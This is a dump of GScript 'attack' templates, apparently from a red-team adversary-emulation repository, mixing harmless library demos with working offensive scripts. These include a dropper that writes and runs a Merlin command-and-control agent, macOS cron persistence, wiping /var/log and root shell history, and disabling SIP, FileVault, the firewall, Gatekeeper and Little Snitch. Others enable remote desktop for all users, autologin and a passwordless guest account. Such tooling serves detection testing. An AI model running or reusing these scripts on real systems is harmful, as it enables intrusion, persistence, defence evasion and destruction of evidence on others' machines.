18 | console.log("Starting GetSHA1FromString");
19 | var sha1s = G.crypto.GetSHA1FromString("test");
20 | console.log("SHA1FromString: "+ sha1s);
21 |
22 | return true;
23 | }
--------------------------------------------------------------------------------
/attack/multi/dropper/merlin_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Merlin Example
3 | // Author: ahhh
4 | // Purpose: Drops merlin as an asset and executes it async
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Uses: https://github.com/Ne0nd0g/merlin
8 |
9 | //priority:150
10 | //timeout:150
11 | //import:/private/tmp/merlinagent.bin
12 |
13 | //go_import:os/user as user2
14 | //go_import:os as os2
15 |
16 | function Deploy() {
17 |
18 | console.log("Starting to drop merlin binary");
19 | // Getting our asset
20 | var merlinBin = GetAssetAsBytes("merlinagent.bin");
21 | console.log("errors: "+merlinBin[1]);
22 |
23 | // Whoami
24 | var myuser = user2.Current();
25 | console.log("user: "+Dump(myuser[0]));
26 |
27 | // Getting a random string
28 | var temppath = os2.TempDir();
29 | var naming = G.rand.GetAlphaString(4);
30 | //var naming = "aOKware";
31 | naming = naming.toLowerCase();
32 |
33 | // Determine OS
34 | console.log("os: "+OS);
35 | console.log("arch: "+ARCH);
36 | var fullpath;
37 | if (OS == "windows") {
38 | //if windows
39 | fullpath = temppath+"\\"+naming+".exe";
40 | } else {
41 | //if linux or OSX
42 | fullpath = temppath+"/"+naming;
43 | }
44 | console.log("file name: "+ fullpath);
45 |
46 | // Write payload
47 | errors = G.file.WriteFileFromBytes(fullpath, merlinBin[0]);
48 | console.log("errors: "+errors);
49 |
50 | // Run payload
51 | var running = G.exec.ExecuteCommandAsync(fullpath, [""]);
52 | console.log("errors: "+running[1]);
53 |
54 | return true
55 | }
56 |
--------------------------------------------------------------------------------
/attack/multi/encoding/encoding_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Multi Platform Encoding Examples
3 | // Author: ahhh
4 | // Purpose: Testing a bunch of data encoding on different platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | function Deploy() {
12 | console.log("Starting Base64e Command");
13 | var b64 = G.encoding.EncodeBase64("hello world");
14 | console.log("b64e: "+b64);
15 |
16 | console.log("Starting Base64d Command");
17 | var decoded = G.encoding.DecodeBase64("aGVsbG8gd29ybGQ=");
18 | console.log("b64d: "+decoded[0]);
19 | console.log("b64d errors: "+ decoded[1]);
20 |
21 | console.log("Starting EncodeStringAsBytes");
22 | var bytes = G.encoding.EncodeStringAsBytes("test");
23 | console.log("bytes: "+ bytes);
24 |
25 | console.log("EncodingBytesAsString");
26 | var bstring = G.encoding.EncodeBytesAsString(bytes);
27 | console.log("bytes to string: "+ bstring);
28 |
29 | return true;
30 | }
31 |
--------------------------------------------------------------------------------
/attack/multi/exec/exec_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Cross Platform Execute Example
3 | // Author: ahhh
4 | // Purpose: executes something that should work on multiple platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 | //go_import:github.com/gen0cide/gscript/stdlib/exec as exec
11 |
12 | function Deploy() {
13 | console.log("Starting Exec Command");
14 | var response = G.exec.ExecuteCommand("netstat", ["-a"]);
15 | console.log("Pid: "+response[0]);
16 | console.log("stdout: "+response[1])
17 | console.log("stderr: "+response[2])
18 | console.log("exit code: "+response[3])
19 | console.log("go errors: "+response[4])
20 | return true;
21 | }
22 |
--------------------------------------------------------------------------------
/attack/multi/exec/execa_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Cross Platform Execute Async Example
3 | // Author: ahhh
4 | // Purpose: executes something that should work on multiple platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | function Deploy() {
12 | console.log("Starting Exec Command");
13 | var response = G.exec.ExecuteCommandAsync("netstat", ["-a"]);
14 | console.log("cmd_obj: "+response[0]);
15 | return true;
16 | }
17 |
--------------------------------------------------------------------------------
/attack/multi/file/delete_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Multi Platform Delete File Example
3 | // Author: ahhh
4 | // Purpose: Testing a delete file on different platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 | //go_import:os as os2
11 |
12 | function Deploy() {
13 |
14 | console.log("Starting Delete File");
15 | var errors = os2.Remove("test_file.txt");
16 | console.log("errors: "+errors);
17 |
18 | return true;
19 | }
--------------------------------------------------------------------------------
/attack/multi/file/write_examples.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Multi Platform Write File Example
3 | // Author: ahhh
4 | // Purpose: Testing an asset and write file on different platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //import:/private/tmp/example.bin
9 |
10 | //priority:150
11 | //timeout:150
12 |
13 | function Deploy() {
14 |
15 | console.log("Starting Write File form Bytes");
16 | var myBin = GetAssetAsBytes("example.bin");
17 | errors = G.file.WriteFileFromBytes("example_test", myBin[0]);
18 | console.log("errors: "+errors);
19 |
20 | console.log("Starting Copy File");
21 | var copyErrors = G.file.CopyFile("example_test", "example_test2");
22 | console.log("errors: " +copyErrors);
23 |
24 | console.log("Starting Write file from String");
25 | var writeStringErrors = G.file.WriteFileFromString("example_test3", "Example test\n");
26 | console.log("errors: "+ writeStringErrors);
27 |
28 | console.log("Starting Read file as bytes");
29 | var fileBytes = G.file.ReadFileAsBytes("example_test3");
30 | console.log("errors: "+ fileBytes[1]);
31 |
32 | console.log("Starting Append file bytes");
33 | var appendedFileError1 = G.file.AppendFileBytes("example_test3", fileBytes[0]);
34 | console.log("errors: "+ appendedFileError1);
35 |
36 | console.log("Starting AppendFileString");
37 | var appendedFileError2 = G.file.AppendFileString("example_test3", "Yet Another String\n");
38 | console.log("errors: "+ appendedFileError2);
39 |
40 | console.log("ReplaceInFileWithString");
41 | var replaceError = G.file.ReplaceInFileWithString("example_test3", "test", "science");
42 | console.log("errors: "+ replaceError);
43 |
44 | console.log("ReplaceInFileWithRegex");
45 | var replaceError2 = G.file.ReplaceInFileWithRegex("example_test3", "(Yet)", "Bet");
46 | console.log("errors: "+ replaceError2);
47 |
48 | console.log("SetPerms example");
49 | var permErrors = G.file.SetPerms("example_test3", 0777);
50 | console.log("errors: "+permErrors);
51 |
52 | console.log("Seting ReadFileAsString");
53 | var readFile = G.file.ReadFileAsString("example_test3");
54 | console.log("errors: "+ readFile[1]);
55 | console.log("example_test3 contains:\n"+readFile[0]);
56 |
57 | console.log("Testing CheckExists");
58 | var exists = G.file.CheckExists("example_test");
59 | console.log("Does it: "+exists);
60 |
61 | return true;
62 | }
63 |
--------------------------------------------------------------------------------
/attack/multi/net/httpd_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Cross Platform HTTPD Example
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //go_import:net/http as http
12 |
13 | function Deploy() {
14 | console.log("Starting HTTPD");
15 |
16 | http.ListenAndServe(":8080", null);
17 |
18 | console.log("Done HTTPD");
19 | return true;
20 | }
21 |
--------------------------------------------------------------------------------
/attack/multi/net/net_tcp_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Cross Platform Tcp checking Example
3 | // Author: ahhh
4 | // Purpose: gets checks if some key ports are open on multiple on multiple platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | function Deploy() {
12 | console.log("Starting TCP Checker");
13 | var port = [21, 22, 23, 80, 443, 445, 3389, 5900, 8080]
14 | for (i = 0; i < port.length; i++) {
15 | var response = G.net.CheckForInUseTCP(port[i]);
16 | console.log("TCP "+port[i]+": "+response[0]);
17 | }
18 | console.log("Done TCP Checker");
19 | return true;
20 | }
21 |
--------------------------------------------------------------------------------
/attack/multi/net/net_udp_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Cross Platform UDP checking Example
3 | // Author: ahhh
4 | // Purpose: gets checks if some key ports are open on multiple on multiple platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | function Deploy() {
12 | console.log("Starting UDP Checker");
13 | var port = [53, 67, 68, 69, 123, 161, 162, 389, 636]
14 | for (i = 0; i < port.length; i++) {
15 | var response = G.CheckForInUseUDP(port[i]);
16 | console.log("UDP "+port[i]+": "+response[0]);
17 | }
18 | console.log("Done UDP Checker");
19 | return true;
20 | }
21 |
--------------------------------------------------------------------------------
/attack/multi/net/netcat_tcp_client_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Cross Platform NetCat TCP Example
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //go_import:github.com/dddpaul/gonc/tcp as nc
12 |
13 | function Deploy() {
14 | console.log("Starting NetCat TCP Example");
15 |
16 | nc.StartClient("tcp", "127.0.0.1:", "8080");
17 |
18 | console.log("Done NetCat TCP Example");
19 | return true;
20 | }
21 |
--------------------------------------------------------------------------------
/attack/multi/net/netcat_tcp_server_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Cross Platform NetCat TCP Example
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //go_import:github.com/dddpaul/gonc/tcp as nc
12 |
13 | function Deploy() {
14 | console.log("Starting NetCat TCP Example");
15 |
16 | nc.StartServer("tcp", "127.0.0.1:8080");
17 |
18 | console.log("Done NetCat TCP Example");
19 | return true;
20 | }
21 |
--------------------------------------------------------------------------------
/attack/multi/rand/rand_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Multi Platform Randomness Example
3 | // Author: ahhh
4 | // Purpose: Testing randomness on different platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | function Deploy() {
12 |
13 | console.log("Starting RandomInt");
14 | out1 = G.rand.RandomInt(12, 20);
15 | console.log("out: "+out1);
16 |
17 | console.log("Starting GetAlphaNumericString");
18 | var out2 = G.rand.GetAlphaNumericString(12);
19 | console.log("out: " +out2);
20 | console.log("out upper: "+ out2.toUpperCase());
21 | console.log("out lower: "+ out2.toLowerCase());
22 |
23 | console.log("Starting GetAlphaString");
24 | var out3 = G.rand.GetAlphaString(10);
25 | console.log("out: "+ out3);
26 | console.log("out upper: "+ out3.toUpperCase());
27 | console.log("out lower: "+ out3.toLowerCase());
28 |
29 | console.log("Starting GetAlphaNumericSpecialString");
30 | var out4 = G.rand.GetAlphaNumericSpecialString(7);
31 | console.log("out: "+ out4);
32 | console.log("out upper: "+ out4.toUpperCase());
33 | console.log("out lower: "+ out4.toLowerCase());
34 |
35 | console.log("Starting GetBools");
36 | var out5 = G.rand.GetBool();
37 | console.log("out: "+ out5);
38 |
39 | return true;
40 | }
41 |
--------------------------------------------------------------------------------
/attack/multi/requests/requests_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Multi Platform Requests Example
3 | // Author: ahhh
4 | // Purpose: Testing requests on different platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | function Deploy() {
12 |
13 | var headers = {"User-Agent" : "spaceman"};
14 | console.log("Starting GetURLAsString");
15 | out1 = G.requests.GetURLAsString("http://icanhazip.com", headers, true);
16 | if (out1[2] == null){
17 | console.log("response string: "+out1[1]);
18 | } else {
19 | console.log("errors: "+out1[2].Errors());
20 | }
21 |
22 | console.log("Starting GetURLAsBytes");
23 | var out2 = G.requests.GetURLAsBytes("http://icanhazip.com", headers, true);
24 | if (out2[2] == null){
25 | console.log("response bytes: "+out2[1]);
26 | } else {
27 | console.log("errors: "+out2[2].Errors());
28 | }
29 |
30 | console.log("Starting PostJSON");
31 | var jsons = { "menu" : "item"}
32 | var out3 = G.requests.PostJSON("http://postb.in/jEDtEEvI", jsons, headers, false)
33 | if (out3[2] == null){
34 | console.log("response string: "+out3[1]);
35 | } else {
36 | console.log("errors: "+out3[2].Errors());
37 | }
38 |
39 | console.log("Starting PostURL");
40 | var out4 = G.requests.PostURL("http://postb.in/jEDtEEvI", "test=data", headers, false)
41 | if (out4[2] == null){
42 | console.log("response string: "+out4[1]);
43 | } else {
44 | console.log("errors: "+out4[2].Errors());
45 | }
46 |
47 | //console.log("Starting PostBinary");
48 | //var out5 = G.requests.PostBinary();
49 | //console.log("out: "+ out5);
50 |
51 | return true;
52 | }
53 |
--------------------------------------------------------------------------------
/attack/multi/test/bettercap.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Cross Platform Besttercap tests
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //go_import:net as net
12 | //go_import:github.com/bettercap/bettercap/network as bcap
13 |
14 | function Deploy() {
15 | var ifaces = net.Interfaces()
16 | console.log(ifaces);
17 | console.log(ifaces[0][0].Name);
18 | for (var i=0; i < ifaces[0].length; i++) {
19 | console.log(ifaces[0][i].Name);
20 | var arpTable = bcap.ArpUpdate(ifaces[0][i].Name);
21 | console.log(Dump(arpTable));
22 | }
23 | return true;
24 | }
--------------------------------------------------------------------------------
/attack/multi/test/strings.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Cross Platform Strings Test
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //go_import:strings as strings
12 |
13 | function Deploy() {
14 | console.log(strings.Split("what.is.this", ".")[1]);
15 | return true;
16 | }
17 |
--------------------------------------------------------------------------------
/attack/multi/time/time_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Cross Platform Time Example
3 | // Author: ahhh
4 | // Purpose: gets the current Unix time on multiple platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | function Deploy() {
12 | console.log("Starting Time");
13 | var response = G.time.GetUnix();
14 | console.log("Time: "+response);
15 | return true;
16 | }
17 |
--------------------------------------------------------------------------------
/attack/os_x/cronjob_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Persistence_osx_cronjob
3 | // Author: Jay Hill
4 | // Purpose: cron job persistence on osx
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1168
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //go_import:os as os
12 |
13 | //import:/private/tmp/example.macho
14 |
15 | function Deploy() {
16 | console.log("Start Cron Job on Osx");
17 |
18 | // Getting our asset
19 | var exampleBin = GetAssetAsBytes("example.macho");
20 | if (exampleBin[1] != null) {
21 | console.log("errors: "+exampleBin[1].Error());
22 | }
23 |
24 | // Getting a random filepathc
25 | //var temppath = os.TempDir();
26 | var temppath = "/usr/local";
27 | var naming = G.rand.GetAlphaString(5);
28 | naming = naming.toLowerCase();
29 | var fullpath = temppath+"/"+naming;
30 | console.log("file name: "+ fullpath);
31 | // Write file
32 | var errors = G.file.WriteFileFromBytes(fullpath, exampleBin[0]);
33 | if (errors != null) {
34 | console.log("errors: "+errors.Error());
35 | }
36 |
37 | // Cron Command
38 | var command = "* * * * * "+fullpath+"\n";
39 | // Write the Cron Command
40 | var cronfile = G.rand.GetAlphaNumericString(5);
41 | var tmpcron = os.TempDir();
42 | cronfile = tmpcron+"/"+cronfile.toLowerCase();
43 | var error = G.file.WriteFileFromString(cronfile, command);
44 | if (error != null) {
45 | console.log("errors: "+error.Error());
46 | }
47 |
48 | // Issue the Cron Command
49 | cronexec = G.exec.ExecuteCommand("crontab", [cronfile]);
50 | console.log("Pid: "+cronexec[0]);
51 | console.log("stdout: "+cronexec[1])
52 | console.log("stderr: "+cronexec[2])
53 | console.log("exit code: "+cronexec[3])
54 | if (cronexec[4] != null) {
55 | console.log("go errors: "+Dump(cronexec[4]))
56 | }
57 |
58 | // Remove Cron Command
59 | var err = os.Remove(cronfile);
60 | if (err != null) {
61 | console.log("errors: "+err.Error());
62 | }
63 |
64 | console.log("Done Cron Job on Osx");
65 | return true;
66 | }
--------------------------------------------------------------------------------
/attack/os_x/delete_logs.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Delete Logs
3 | // Author: ahhh
4 | // Purpose: Deletes a number of critical security logs on a linux machine, to see if this is detected by the lack of logs or deletion
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1146
7 | // Note: must run implant as root
8 |
9 | //go_import:os/user as user
10 |
11 | //priority:150
12 | //timeout:150
13 |
14 | function Deploy() {
15 | console.log("starting execution of Delete Logs");
16 | // Whoami
17 | var myuser = user.Current();
18 | console.log("Our user is: "+Dump(myuser[0]));
19 | if (myuser[0].Username == "root") {
20 | //rm -rf /var/run/utmp /var/run/wtmp /var/run/btmp /var/log/
21 | var response = G.exec.ExecuteCommand("rm", ["-rf", "-P", "/var/run/utmp", "/var/run/wtmp", "/var/run/btmp", "/var/log/"]);
22 | console.log("Pid: "+response[0]);
23 | console.log("stdout: "+response[1]);
24 | console.log("stderr: "+response[2]);
25 | console.log("exit code: "+response[3]);
26 | console.log("go errors: "+response[4]);
27 | console.log("Removed /var/run/utmp, /var/run/wtmp, /var/run/btmp, and all of /var/log/");
28 | var response2 = G.exec.ExecuteCommand("rm", ["-rf", "-P", "/var/root/.sh_history"]);
29 | console.log("Pid: "+response2[0]);
30 | console.log("stdout: "+response2[1]);
31 | console.log("stderr: "+response2[2]);
32 | console.log("exit code: "+response2[3]);
33 | console.log("go errors: "+response2[4]);
34 | console.log("Cleared the root bash history");
35 | } else {
36 | console.log("Detected a non-root user, this needs to run as root!");
37 | }
38 | return true;
39 | }
40 |
--------------------------------------------------------------------------------
/attack/os_x/disable_SIP.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable SIP
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Note: must run implant as root
8 |
9 | //go_import:os/user as user
10 |
11 | //priority:150
12 | //timeout:150
13 |
14 | function Deploy() {
15 | console.log("starting execution of Disable SIP");
16 | // Whoami
17 | var myuser = user.Current();
18 | console.log("Our user is: "+Dump(myuser[0]));
19 | if (myuser[0].Username == "root") {
20 | var response = G.exec.ExecuteCommand("csrutil", ["disable"]);
21 | console.log("Pid: "+response[0]);
22 | console.log("stdout: "+response[1]);
23 | console.log("stderr: "+response[2]);
24 | console.log("exit code: "+response[3]);
25 | console.log("go errors: "+response[4]);
26 | console.log("Done Disable SIP");
27 | } else {
28 | console.log("Detected a non-root user, this needs to run as root!");
29 | }
30 | return true;
31 | }
32 |
33 |
--------------------------------------------------------------------------------
/attack/os_x/disable_filevault.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable Filevault
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Note: must run implant as root
8 |
9 | //go_import:os/user as user
10 |
11 | //priority:150
12 | //timeout:150
13 |
14 | function Deploy() {
15 | console.log("starting execution of Disable Filevault");
16 | // Whoami
17 | var myuser = user.Current();
18 | console.log("Our user is: "+Dump(myuser[0]));
19 | if (myuser[0].Username == "root") {
20 | var response = G.exec.ExecuteCommand("fdesetup", ["disable"]);
21 | console.log("Pid: "+response[0]);
22 | console.log("stdout: "+response[1]);
23 | console.log("stderr: "+response[2]);
24 | console.log("exit code: "+response[3]);
25 | console.log("go errors: "+response[4]);
26 | console.log("Done Disable Filevault");
27 | } else {
28 | console.log("Detected a non-root user, this needs to run as root!");
29 | }
30 | return true;
31 | }
32 |
33 |
--------------------------------------------------------------------------------
/attack/os_x/disable_firewall.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable Firewall
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Note: must run implant as root
8 |
9 | //go_import:os/user as user
10 |
11 | //priority:120
12 | //timeout:150
13 |
14 | function Deploy() {
15 | console.log("starting execution of Disable Firewall");
16 | // Whoami
17 | var myuser = user.Current();
18 | console.log("Our user is: "+Dump(myuser[0]));
19 | if (myuser[0].Username == "root") {
20 | var response = G.exec.ExecuteCommand("defaults", ["write", "/Library/Preferences/com.apple.alf", "globalstate", "-int", "0"]);
21 | console.log("Pid: "+response[0]);
22 | console.log("stdout: "+response[1]);
23 | console.log("stderr: "+response[2]);
24 | console.log("exit code: "+response[3]);
25 | console.log("go errors: "+response[4]);
26 | var response2 = G.exec.ExecuteCommand("launchctl", ["unload", "/System/Library/LaunchDaemons/com.apple.alf.agent.plist"]);
27 | console.log("Pid: "+response2[0]);
28 | console.log("stdout: "+response2[1]);
29 | console.log("stderr: "+response2[2]);
30 | console.log("exit code: "+response2[3]);
31 | console.log("go errors: "+response2[4]);
32 |
33 | console.log("Done Disable Firewall");
34 | } else {
35 | console.log("Detected a non-root user, this needs to run as root!");
36 | }
37 | return true;
38 | }
39 |
40 |
--------------------------------------------------------------------------------
/attack/os_x/disable_gatekeeper.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable GateKeeper
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Note: must run implant as root
8 |
9 | //go_import:os/user as user
10 |
11 | //priority:150
12 | //timeout:150
13 |
14 | function Deploy() {
15 | console.log("starting execution of Disable GateKeeper");
16 | // Whoami
17 | var myuser = user.Current();
18 | console.log("Our user is: "+Dump(myuser[0]));
19 | if (myuser[0].Username == "root") {
20 | var response = G.exec.ExecuteCommand("spctl", ["--master-disable"]);
21 | console.log("Pid: "+response[0]);
22 | console.log("stdout: "+response[1]);
23 | console.log("stderr: "+response[2]);
24 | console.log("exit code: "+response[3]);
25 | console.log("go errors: "+response[4]);
26 | console.log("Done Disable GateKeeper");
27 | } else {
28 | console.log("Detected a non-root user, this needs to run as root!");
29 | }
30 | return true;
31 | }
32 |
33 |
--------------------------------------------------------------------------------
/attack/os_x/disable_littlesnitch.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable LittleSnitch
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Note: must run implant as root
8 |
9 | //go_import:os/user as user
10 |
11 | //priority:150
12 | //timeout:150
13 |
14 | function Deploy() {
15 | console.log("starting execution of Disable LittleSnitch");
16 | // Whoami
17 | var myuser = user.Current();
18 | console.log("Our user is: "+Dump(myuser[0]));
19 | if (myuser[0].Username == "root") {
20 | var response = G.exec.ExecuteCommand("mv", ["/Library/Little Snitch", "/Library/Little Snitch.backup"]);
21 | console.log("Pid: "+response[0]);
22 | console.log("stdout: "+response[1]);
23 | console.log("stderr: "+response[2]);
24 | console.log("exit code: "+response[3]);
25 | console.log("go errors: "+response[4]);
26 | var response2 = G.exec.ExecuteCommand("killall", ["lsd"]);
27 | console.log("Pid: "+response2[0]);
28 | console.log("stdout: "+response2[1]);
29 | console.log("stderr: "+response2[2]);
30 | console.log("exit code: "+response2[3]);
31 | console.log("go errors: "+response2[4]);
32 | console.log("Done Disable LittleSnitch");
33 | } else {
34 | console.log("Detected a non-root user, this needs to run as root!");
35 | }
36 | return true;
37 | }
38 |
39 |
--------------------------------------------------------------------------------
/attack/os_x/enable_ard.gs:
--------------------------------------------------------------------------------
1 |
2 | // enable apple remote desktop
3 | // Title: enable apple RDP
4 | // Author:
5 | // Purpose:
6 | // Gscript version: 1.0.0
7 | // Tactic:
8 | // ATT&CK:
9 |
10 | //priority:130
11 | //timeout:130
12 |
13 | //go_import:os/user as user
14 |
15 | function Deploy() {
16 | console.log("Enabling apple RDP service");
17 |
18 | //Ensure running as root
19 | var curUser = user.Current();
20 | console.log("Our user is: "+curUser[0].Username);
21 | if (curUser[0].Username == "root") {
22 | var execResp = G.exec.ExecuteCommand("/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart", ["-activate", "-configure", "-allowAccessFor", "-allUsers", "-privs", "-all", "-clientopts", "-setmenuextra"]);
23 | console.log("Pid: "+execResp[0]);
24 | console.log("stdout: "+execResp[1])
25 | console.log("stderr: "+execResp[2])
26 | console.log("exit code: "+execResp[3])
27 | if (execResp[4] != null) {
28 | console.log("go errors: "+Dump(execResp[4]))
29 | }
30 | } else {
31 | console.log("Not running as root!");
32 | }
33 |
34 | console.log("Enabling apple RDP service");
35 | return true;
36 | }
37 |
38 |
39 |
40 |
--------------------------------------------------------------------------------
/attack/os_x/enable_autologin.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Enable Autologin
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Note: must run implant as root
8 |
9 | //go_import:os/user as user
10 |
11 | //priority:150
12 | //timeout:150
13 |
14 | function Deploy() {
15 | console.log("starting execution of Enable Autologin");
16 | // Whoami
17 | var myuser = user.Current();
18 | console.log("Our user is: "+Dump(myuser[0]));
19 | if (myuser[0].Username == "root") {
20 | var response2 = G.exec.ExecuteCommand("defaults", ["write", "/Library/Preferences/com.apple.loginwindow", "GuestEnabled", "-bool", "YES"]);
21 | console.log("Pid: "+response2[0]);
22 | console.log("stdout: "+response2[1]);
23 | console.log("stderr: "+response2[2]);
24 | console.log("exit code: "+response2[3]);
25 | console.log("go errors: "+response2[4]);
26 |
27 | var response = G.exec.ExecuteCommand("defaults", ["write", "/Library/Preferences/com.apple.loginwindow", "autoLoginUser", 'Guest']);
28 | console.log("Pid: "+response[0]);
29 | console.log("stdout: "+response[1]);
30 | console.log("stderr: "+response[2]);
31 | console.log("exit code: "+response[3]);
32 | console.log("go errors: "+response[4]);
33 | console.log("Done Enable Autologin");
34 | } else {
35 | console.log("Detected a non-root user, this needs to run as root!");
36 | }
37 | return true;
38 | }
39 |
40 |
--------------------------------------------------------------------------------
/attack/os_x/enable_fileshares.gs:
--------------------------------------------------------------------------------
1 |
2 | // enable apple file shares
3 | // Title: enable apple file shares
4 | // Author:
5 | // Purpose:
6 | // Gscript version: 1.0.0
7 | // Tactic:
8 | // ATT&CK:
9 |
10 | //priority:130
11 | //timeout:130
12 |
13 | //go_import:os/user as user
14 |
15 | function Deploy() {
16 | console.log("Enabling apple file shares");
17 |
18 | //Ensure running as root
19 | var curUser = user.Current();
20 | console.log("Our user is: "+curUser[0].Username);
21 | if (curUser[0].Username == "root") {
22 | var execResp = G.exec.ExecuteCommand("launchctl", ["load", "-w", "/System/Library/LaunchDaemons/com.apple.AppleFileServer.plist"]);
23 | console.log("Pid: "+execResp[0]);
24 | console.log("stdout: "+execResp[1])
25 | console.log("stderr: "+execResp[2])
26 | console.log("exit code: "+execResp[3])
27 | if (execResp[4] != null) {
28 | console.log("go errors: "+execResp[4].Errors());
29 | }
30 | } else {
31 | console.log("Not running as root!");
32 | }
33 |
34 | console.log("Enabling apple file shares");
35 | return true;
36 | }
37 |
38 |
39 |
40 |
--------------------------------------------------------------------------------
/attack/os_x/enable_guest.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Enable Guest
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Note: must run implant as root
8 |
9 | //go_import:os/user as user
10 |
11 | //priority:120
12 | //timeout:150
13 |
14 | function Deploy() {
15 | console.log("starting execution of Enable Guest");
16 | // Whoami
17 | var myuser = user.Current();
18 | console.log("Our user is: "+Dump(myuser[0]));
19 | if (myuser[0].Username == "root") {
20 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest"]);
21 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "dsAttrTypeNative:_defaultLanguage", "en"]);
22 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "dsAttrTypeNative:_guest", "true"]);
23 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "dsAttrTypeNative:_writers_defaultLanguage", "Guest"]);
24 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "dsAttrTypeNative:_writers_LinkedIdentity", "Guest"]);
25 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "dsAttrTypeNative:_writers_UserCertificate", "Guest"]);
26 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "AuthenticationHint", ""]);
27 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "NFSHomeDirectory", "/Users/Guest"]);
28 | G.exec.ExecuteCommand("dscl", [".", "-passwd", "/Users/Guest", ""]);
29 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "Picture", "/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/UserIcon.icns"]);
30 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "PrimaryGroupID", "201"]);
31 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "RealName", "Guest User"]);
32 | G.exec.ExecuteCommand("dscl", [".", "-create", "/Users/Guest", "RecordName", "Guest"]);
